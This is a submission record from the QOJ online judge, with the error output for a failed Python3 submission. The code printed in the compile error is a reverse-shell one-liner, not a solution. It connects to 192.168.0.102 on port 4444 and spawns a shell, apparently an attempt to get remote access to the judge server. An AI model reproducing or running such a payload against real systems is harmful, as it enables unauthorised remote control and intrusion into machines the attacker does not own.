QOJ.ac
QOJ
ID | 题目 | 提交者 | 结果 | 用时 | 内存 | 语言 | 文件大小 | 提交时间 | 测评时间 |
---|---|---|---|---|---|---|---|---|---|
#869197 | #9987. 骑行计划 | HuangHanSheng | Compile Error | / | / | Python3 | 224b | 2025-01-25 00:16:08 | 2025-01-25 00:16:08 |
Due to the privacy settings of the submitter, you are not allowed to view this code.
詳細信息
File "answer.code", line 1 export RHOST="192.168.0.102";export RPORT=4444;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("powershell")' ^^^^^ SyntaxError: invalid syntax